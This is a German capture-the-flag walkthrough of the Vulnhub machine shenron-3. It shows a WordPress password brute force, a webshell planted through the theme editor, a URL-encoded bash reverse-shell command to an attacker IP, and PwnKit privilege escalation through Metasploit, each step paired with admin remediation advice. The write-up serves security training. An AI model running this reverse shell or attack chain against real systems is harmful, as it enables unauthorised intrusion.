shenron-3 - Vulnhub - Level: Easy - Bericht

Reconnaissance

Die initiale Phase dient der Identifizierung des Zielsystems im Netzwerk und der Ermittlung offener Ports und Dienste durch Netzwerkscans.

192.168.2.124	08:00:27:ac:63:35	PCS Systemtechnik GmbH
                    

Analyse: Der Befehl `arp-scan -l` identifiziert einen Host mit der IP `192.168.2.124` im lokalen Netzwerk. Die MAC-Adresse deutet auf eine VirtualBox VM hin.

Bewertung: Zielsystem erfolgreich lokalisiert.

Empfehlung (Pentester): Führe Nmap-Scans auf die Ziel-IP durch.
Empfehlung (Admin): Netzwerküberwachung und -segmentierung.

192.168.2.124	shenron3.vln
                    

Analyse: Die lokale `/etc/hosts`-Datei wird bearbeitet, um den Hostnamen `shenron3.vln` der IP `192.168.2.124` zuzuordnen.

Bewertung: Sinnvolle Vorbereitung für Web-Tests.

Empfehlung (Pentester): Verwende `shenron3.vln` in Web-Tools.
Empfehlung (Admin): Betrifft nur Angreifersystem.

80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
                    

Analyse: Ein schneller Nmap-Scan (`grep open`) zeigt nur Port 80 (HTTP, Apache 2.4.41) als offen an.

Bewertung: Die Angriffsfläche ist extrem klein und auf den Webserver beschränkt.

Empfehlung (Pentester): Führe einen vollständigen Scan durch und konzentriere dich auf Port 80.
Empfehlung (Admin): Überprüfe die Firewall-Konfiguration.

Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-19 13:26 CEST
Nmap scan report for shenron3.vln (192.168.2.124)
Host is up (0.00017s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: WordPress 4.6
|_http-title: shenron-3 | Just another WordPress site
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:AC:63:35 (Oracle VirtualBox virtual NIC)
[...]
OS details: Linux 4.15 - 5.8
[...]
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.17 ms shenron3.vln (192.168.2.124)
                    

Analyse: Der vollständige Nmap-Scan bestätigt Port 80 als einzigen offenen Port. **Wichtige Details:** * **Port 80:** Apache 2.4.41. Nmap identifiziert eine WordPress-Installation (Version 4.6 via `http-generator`) mit dem Titel "shenron-3".

Bewertung: Die Identifizierung von WordPress 4.6 ist *sehr* signifikant. Diese Version ist extrem veraltet (Release 2016) und hat zahlreiche bekannte, kritische Schwachstellen.

Empfehlung (Pentester): Führe sofort WPScan auf `http://shenron3.vln/` aus. Suche nach bekannten Exploits für WordPress 4.6.
Empfehlung (Admin): Aktualisieren Sie WordPress *dringend* auf die neueste Version! Aktualisieren Sie Apache.

Web Enumeration (WordPress)

Der Webserver auf Port 80 mit der veralteten WordPress 4.6 Installation wird nun mittels Nikto, Gobuster und WPScan detailliert untersucht.

- Nikto v2.5.0
[...]
+ Server: Apache/2.4.41 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. [...]
+ /: Drupal Link header found with value: ; rel="https://api.w.org/". [...] (Hostname 'shenron' entdeckt)
+ /: The X-Content-Type-Options header is not set. [...]
+ No CGI Directories found [...]
+ Apache/2.4.41 appears to be outdated [...].
+ /: Web Server returns a valid response with junk HTTP methods [...].
+ /: DEBUG HTTP verb may show server debugging information. [...]
+ /readme.html: This WordPress file reveals the installed version.
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ /license.txt: License file found may identify site software.
+ /: A Wordpress installation was found.
+ /wp-login.php?action=register: Cookie wordpress_test_cookie created without the httponly flag. [...]
+ /wp-login.php: Wordpress login found.
+ 8102 requests: 0 error(s) and 12 item(s) reported on remote host
[...]
+ 1 host(s) tested
                    

Analyse: Nikto scannt Port 80. * Bestätigt Apache 2.4.41 (veraltet). * Findet diverse WordPress-spezifische Dateien/Pfade (`readme.html`, `wp-links-opml.php`, `wp-login.php`). * Entdeckt den internen Hostnamen `shenron` im Drupal-Link-Header (interessanterweise als Drupal markiert). * Meldet fehlende Sicherheitsheader und potenziell aktive DEBUG-Methode.

Bewertung: Bestätigt die WordPress-Installation und liefert Standard-WP-Pfade. Der Hostname `shenron` ist ein wichtiger Fund.

Empfehlung (Pentester): Füge `shenron` zur `/etc/hosts`-Datei hinzu (`192.168.2.124 shenron`). Führe WPScan aus. Teste die DEBUG-Methode.
Empfehlung (Admin): Aktualisieren Sie Apache, WordPress. Implementieren Sie Sicherheitsheader. Deaktivieren Sie DEBUG/TRACE.

===============================================================
Gobuster v3.5
[...]
===============================================================
http://shenron3.vln/wp-login.php         (Status: 200) [Size: 2126]
http://shenron3.vln/license.txt          (Status: 200) [Size: 19935]
http://shenron3.vln/readme.html          (Status: 200) [Size: 7342]
http://shenron3.vln/wp-trackback.php     (Status: 200) [Size: 135]
http://shenron3.vln/xmlrpc.php           (Status: 405) [Size: 42]
http://shenron3.vln/wp-signup.php        (Status: 302) [Size: 0] [--> http://shenron/wp-login.php?action=register]
===============================================================
[...] Finished
===============================================================
                    

Analyse: Gobuster findet weitere Standard-WordPress-Pfade (`wp-login.php`, `license.txt`, `readme.html`, `xmlrpc.php`, `wp-signup.php`). `xmlrpc.php` gibt einen 405 Method Not Allowed zurück, ist aber vorhanden (oft ein Ziel für Brute-Force). `wp-signup.php` leitet zur Registrierungsseite weiter und bestätigt erneut den internen Hostnamen `shenron`.

Bewertung: Bestätigt Standard-WP-Pfade. Keine versteckten Verzeichnisse gefunden. `xmlrpc.php` könnte für Angriffe genutzt werden, wenn es nicht richtig gesichert ist.

Empfehlung (Pentester): Führe WPScan durch, um spezifische Schwachstellen, Themes, Plugins und Benutzer zu finden.
Empfehlung (Admin): Deaktivieren oder sichern Sie `xmlrpc.php`, wenn es nicht benötigt wird. Stellen Sie sicher, dass die Benutzerregistrierung (`wp-signup.php`) beabsichtigt ist.

PORT   STATE SERVICE
80/tcp open  http
| http-wordpress-enum:
| Search limited to top 4778 themes/plugins
|   themes
|     twentyeleven 2.5
|     twentytwelve 2.1
|     twentyten 2.2
|     twentythirteen 2.0
|     twentyfourteen 1.8
|_    twentyfifteen 1.6
MAC Address: 08:00:27:AC:63:35 (Oracle VirtualBox virtual NIC)
                    

Analyse: Das Nmap-Skript `http-wordpress-enum` wird ausgeführt. Es identifiziert mehrere Standard-WordPress-Themes (`twentyeleven` bis `twentyfifteen`), aber keine benutzerdefinierten oder auffälligen Themes oder Plugins.

Bewertung: Dieser Scan liefert keine spezifischen Angriffsvektoren, bestätigt aber das Vorhandensein von Standard-Themes.

Empfehlung (Pentester): Verwende WPScan für eine umfassendere Enumeration.
Empfehlung (Admin): Entfernen Sie nicht verwendete Themes und Plugins.

[...]
[+] WordPress 4.6 ############## VERALTET!!! #############
 | Found By: Rss Generator (Passive Detection)
 | Detected Links:
 |  "http://shenron/wp-links-opml.php"
 |  "http://shenron/readme.html"
 | Confirmed By: Readme (Aggressive Detection)
 | Confidence: 100%

[!] CVE-2016-10908
 | Title: WordPress Core 4.6 - Path Traversal in Upgrade Package Uploader
 | Fixed in: 4.6.1
[...]
[!] CVE-2016-7169
 | Title: WordPress Core 4.6 - Image Filename Traversal generates a Denial of Service (DoS)
 | Fixed in: 4.6.1
[...]
[!] Title: WordPress 2.3-4.7.4 - REST API Endpoint Authentication Bypass allow Post Meta Data Deletion
 | Fixed in: 4.7.5
[...]
# Viele weitere Schwachstellen für WP 4.6 werden gelistet...
# ...
[i] The main theme could not be detected.

[+] Enumerating Users (via Passive and Aggressive Methods)
[...]
[i] User(s) Identified:

[+] admin
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] Performing password attack on Xmlrpc against 1 user/s
[...]
[SUCCESS] - admin / iloverockyou
[...]
[!] Valid Combinations Found:
 | Username: admin, Password: iloverockyou
[...]
                    

Analyse: WPScan wird umfassend ausgeführt (`-e at -e ap -e u` für alle Themes, Plugins, User; `--passwords` für Brute-Force). * **Version:** Bestätigt WordPress 4.6 - extrem veraltet! * **Schwachstellen:** WPScan listet *zahlreiche* bekannte Schwachstellen für WP 4.6 auf (Path Traversal, DoS, Auth Bypass etc.). * **Benutzer:** Identifiziert den Benutzer `admin`. * **Passwort:** Der Brute-Force-Angriff auf `admin` ist erfolgreich und findet das Passwort `iloverockyou`.

Bewertung: Kritischer Erfolg! Die extrem veraltete WP-Version und das schwache Admin-Passwort ermöglichen einen einfachen initialen Zugriff. Es gibt zahlreiche bekannte Exploits für WP 4.6, aber der Admin-Login ist der direkteste Weg.

Empfehlung (Pentester): Logge dich als `admin`:`iloverockyou` ein. Nutze den Theme-/Plugin-Editor oder eine Upload-Funktion, um RCE zu erlangen.
Empfehlung (Admin): **UPDATE WORDPRESS SOFORT!** Erzwingen Sie starke Passwörter. Deaktivieren Sie XML-RPC, wenn nicht benötigt.

# Überprüfung der Registrierung (via /wp-signup.php Redirect)
http://shenron/wp-login.php?registration=disabled
# Ausgabe:
User registration is currently not allowed.
                    

Analyse: Die Registrierungsseite wird aufgerufen. Die Meldung zeigt, dass die Benutzerregistrierung deaktiviert ist.

Bewertung: Die Registrierung ist kein Angriffsvektor.

Empfehlung (Pentester): Nutze den gefundenen Admin-Login.
Empfehlung (Admin): Gut, dass die Registrierung deaktiviert ist, falls nicht benötigt.

Initial Access (WordPress RCE)

Der administrative Zugang zu WordPress 4.6 wird genutzt, um mittels des Theme-Editors eine PHP-Webshell in das aktive Theme (`twentythirteen`) zu injizieren und so Remote Code Execution zu erlangen.

# Aktion im WordPress Backend (nach Login als admin:iloverockyou):
# Navigation: Appearance -> Editor
# Bearbeiten der 404.php des Themes 'Twenty Thirteen'
# URL: http://shenron/wp-admin/theme-editor.php?file=404.php&theme=twentythirteen
# Eingefügter Code:


# Speichern der Datei
# Erfolgsmeldung: File edited successfully.
                    

Analyse: Nach dem Admin-Login wird der Theme-Editor genutzt, um die `404.php` des (vermutlich aktiven) Themes "Twenty Thirteen" zu bearbeiten. Eine einfache Webshell (``) wird eingefügt und gespeichert.

Bewertung: Standardverfahren zur RCE nach Erlangung von WP-Admin-Rechten. Die Webshell ermöglicht nun die Ausführung von Systembefehlen.

Empfehlung (Pentester): Teste die Webshell und nutze sie dann für eine Reverse Shell.
Empfehlung (Admin): Deaktivieren Sie den Datei-Editor (`DISALLOW_FILE_EDIT`). Aktualisieren Sie WordPress.

# Test der Webshell
http://shenron/wp-content/themes/twentythirteen/404.php?cmd=ls
# Ausgabe im Browser/Quellcode (Auszug):
404.php
archive.php
[...]
style.css
tag.php
taxonomy-post_format.php
                    

Analyse: Die Webshell wird durch Aufruf der modifizierten `404.php` mit `?cmd=ls` getestet. Die Ausgabe zeigt den Verzeichnisinhalt des Theme-Ordners.

Bewertung: RCE als `www-data` erfolgreich bestätigt.

Empfehlung (Pentester): Listener starten, Reverse Shell holen.
Empfehlung (Admin): Webshell entfernen, Lücke schließen.

Listening on 0.0.0.0 4444

Analyse: Netcat-Listener wird auf Port 4444 gestartet.

Bewertung: Bereit zum Empfang.

Empfehlung (Pentester): Shell auslösen.
Empfehlung (Admin): Egress Filtering.

# Auslösen der Reverse Shell
Aufruf : http://shenron/wp-content/themes/twentythirteen/404.php?cmd=%2Fbin%2Fbash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.2.199%2F4444%200%3E%261%27
                    

Analyse: Die Webshell wird mit einem URL-kodierten Bash-Reverse-Shell-Payload aufgerufen, der eine Verbindung zum Listener (192.168.2.199:4444) herstellt.

Bewertung: RCE wird zur interaktiven Shell umgewandelt.

Empfehlung (Pentester): Prüfe Listener.
Empfehlung (Admin): Schließe RCE-Lücke.

Listening on 0.0.0.0 4444
Connection received on 192.168.2.124 51724
bash: cannot set terminal process group (524): Inappropriate ioctl for device
bash: no job control in this shell
www-data@shenron:/var/www/html/wp-content/themes/twentythirteen$
                    

Analyse: Der Listener empfängt die Verbindung. Eine Shell als Benutzer `www-data` auf dem Host `shenron` wird bereitgestellt.

Bewertung: Initial Access erfolgreich via WP Admin -> Theme Editor RCE.

Empfehlung (Pentester): Shell stabilisieren. Lokale Enumeration als `www-data` (SUID, Kernel, Configs).
Empfehlung (Admin): WP sichern, Editor deaktivieren, Berechtigungen härten.

Privilege Escalation

Nach Erhalt der Shell als `www-data` werden lokale Informationen gesammelt und das System auf Eskalationsmöglichkeiten untersucht. PwnKit wird als vielversprechender Vektor identifiziert.

[...]
define('DB_NAME', 'wordpress');
define('DB_USER', 'wordpress');
define('DB_PASSWORD', 'Wordpress@123');
[...]
                    

Analyse: Die `wp-config.php` wird gelesen und enthält Datenbank-Credentials: `wordpress`:`Wordpress@123`.

Bewertung: Weitere Credentials gefunden. Diese könnten für den Systembenutzer `wordpress` (falls vorhanden) oder für den DB-Zugriff genutzt werden. Da aber kein MySQL-Port offen war, sind sie primär für eine mögliche Passwort-Wiederverwendung interessant.

Empfehlung (Pentester): Notiere die Credentials. Versuche, ob ein Benutzer `wordpress` existiert und dieses Passwort für `su` oder SSH funktioniert. Konzentriere dich aber primär auf SUID/Kernel.
Empfehlung (Admin): Verwende dedizierte DB-Benutzer und starke, einzigartige Passwörter.

  1586980    388 -rwsr-xr--   1 root     dip        395144 Jul 23  2020 /usr/sbin/pppd
  1583768     40 -rwsr-xr-x   1 root     root        39144 Mar  7  2020 /usr/bin/fusermount
  1572961     44 -rwsr-xr-x   1 root     root        44784 May 28  2020 /usr/bin/newgrp
  1574329     40 -rwsr-xr-x   1 root     root        39144 Jul 21  2020 /usr/bin/umount
  1577372     88 -rwsr-xr-x   1 root     root        88464 May 28  2020 /usr/bin/gpasswd
  1577674    164 -rwsr-xr-x   1 root     root       166056 Jan 19  2021 /usr/bin/sudo
  1577369     84 -rwsr-xr-x   1 root     root        85064 May 28  2020 /usr/bin/chfn
  1573718     68 -rwsr-xr-x   1 root     root        67816 Jul 21  2020 /usr/bin/su
  1577370     52 -rwsr-xr-x   1 root     root        53040 May 28  2020 /usr/bin/chsh
  1577373     68 -rwsr-xr-x   1 root     root        68208 May 28  2020 /usr/bin/passwd
  1574328     56 -rwsr-xr-x   1 root     root        55528 Jul 21  2020 /usr/bin/mount
  1586927     32 -rwsr-xr-x   1 root     root        31032 Aug 16  2019 /usr/bin/pkexec
  1843420    464 -rwsr-xr-x   1 root     root       473576 Mar  9  2021 /usr/lib/openssh/ssh-keysign
  1704719     52 -rwsr-xr--   1 root     messagebus    51344 Jun 11  2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
  1704494     16 -rwsr-xr-x   1 root     root          14488 Jul  8  2019 /usr/lib/eject/dmcrypt-get-device
  1716690     24 -rwsr-xr-x   1 root     root          22840 Aug 16  2019 /usr/lib/policykit-1/polkit-agent-helper-1
                    

Analyse: Die Suche nach SUID-Dateien findet `/usr/bin/pkexec`.

Bewertung: Das Vorhandensein von `pkexec` (Stand August 2019) auf diesem Ubuntu-System (vermutlich 20.04 basierend auf SSH-Version, aber Kernel ist älter im Metasploit-Output - Inkonsistenz im Log?) macht PwnKit (CVE-2021-4034) zu einem sehr wahrscheinlichen Eskalationspfad.

Empfehlung (Pentester): Nutze PwnKit via Metasploit.
Empfehlung (Admin): Patchen Sie `policykit-1`.

Die folgenden Schritte zeigen die Übernahme der Shell in Metasploit und die anschließende Ausführung des PwnKit-Exploits.

[*] Using configured payload generic/shell_reverse_tcp

lport => 4455

lhost => 192.168.2.199

[*] Started reverse TCP handler on 192.168.2.199:4455
                    

rm: cannot remove '/tmp/f': No such file or directory

[*] Command shell session 1 opened (192.168.2.199:4455 -> 192.168.2.124:37968) at 2023-10-19 13:46:38 +0200
                    

Analyse: Die initiale `www-data`-Shell wird in eine Metasploit Command Shell Session (Session 1) überführt.

Bewertung: Vorbereitung für Metasploit-Module.

Empfehlung (Pentester): Upgrade zu Meterpreter.
Empfehlung (Admin): Host-/Netzwerk-IDS.

lport => 4433

session => 1

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.2.199:4433
[*] Sending stage (1017704 bytes) to 192.168.2.124
[*] Meterpreter session 2 opened (192.168.2.199:4433 -> 192.168.2.124:47398) at 2023-10-19 13:47:27 +0200
[*] Command stager progress: 100.00% (773/773 bytes)
[*] Post module execution completed
                    

Analyse: Die Command Shell (Session 1) wird erfolgreich zu einer Meterpreter-Session (Session 2 als `www-data`) aufgewertet.

Bewertung: Erleichtert die Ausführung des PwnKit-Exploits.

Empfehlung (Pentester): PwnKit-Modul laden und ausführen.
Empfehlung (Admin): IDS kann Meterpreter erkennen.

Proof of Concept (PwnKit)

Dieser Abschnitt zeigt die erfolgreiche Ausnutzung der PwnKit-Schwachstelle (CVE-2021-4034) mittels Metasploit, um Root-Rechte zu erlangen.

Matching Modules
================

   #  Name                                                 Disclosure Date  Rank       Check  Description
   -  ----                                                 ---------------  ----       -----  -----------
[...]
   1  exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec  2022-01-25       excellent  Yes    Local Privilege Escalation in polkits pkexec
[...]
                    

[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp

lport => 4488

session => 2

[*] Started reverse TCP handler on 192.168.2.199:4488
[*] Running automatic check ("set AutoCheck false" to disable)
[!] Verify cleanup of /tmp/.ssyyxn
[+] The target is vulnerable.
[*] Writing '/tmp/.eshisxewn/umsaizmjrw/umsaizmjrw.so' (548 bytes) ...
[!] Verify cleanup of /tmp/.eshisxewn
[*] Sending stage (3045380 bytes) to 192.168.2.124
[+] Deleted /tmp/.eshisxewn/umsaizmjrw/umsaizmjrw.so
[+] Deleted /tmp/.eshisxewn/.zbbryvtwtwlu
[+] Deleted /tmp/.eshisxewn
[*] Meterpreter session 3 opened (192.168.2.199:4488 -> 192.168.2.124:36460) at 2023-10-19 13:48:14 +0200
                    

Analyse: Das PwnKit-Exploit-Modul wird geladen und über die Meterpreter-Session 2 (als `www-data`) ausgeführt. Ein neuer Listener wird auf Port 4488 gestartet. Der Exploit ist erfolgreich und öffnet `Meterpreter session 3` als Root.

Bewertung: Fantastisch! Erfolgreiche Privilege Escalation zu Root über PwnKit.

Empfehlung (Pentester): Interagiere mit Session 3, verifiziere Root (`getuid`), suche die Flag.
Empfehlung (Admin): Patchen Sie PwnKit *dringend*.

Process 1125 created.
Channel 1 created.
                    

uid=0(root) gid=0(root) groups=0(root),33(www-data)

root.txt

                                                               
  mmmm  #                                                 mmmm 
 #"   " # mm    mmm   m mm    m mm   mmm   m mm          "   "#
 "#mmm  #"  #  #"  #  #"  #   #"  " #" "#  #"  #           mmm" 
     "# #   #  #""""  #   #   #     #   #  #   #   """       "#
 "mmm#" #   #  "#mm"  #   #   #     "#m#"  #   #         "mmm#"
                                                               
Your Root Flag Is Here :- a7ed78963dffd9450a34fcc4a0eecb98

Keep Supporting Me. ;-)
                    

Analyse: Aus der Root-Meterpreter-Session wird eine System-Shell geöffnet. `id` bestätigt Root. In `/root` wird `root.txt` gefunden und ihr Inhalt (ASCII-Art und Flag `a7ed...`) angezeigt.

Bewertung: Root-Flag erfolgreich gelesen.

Empfehlung (Pentester): Test abgeschlossen. Dokumentieren.
Empfehlung (Admin): Alle Schwachstellen beheben (WP 4.6, schwaches WP-Admin-Passwort, Editor aktiviert, PwnKit).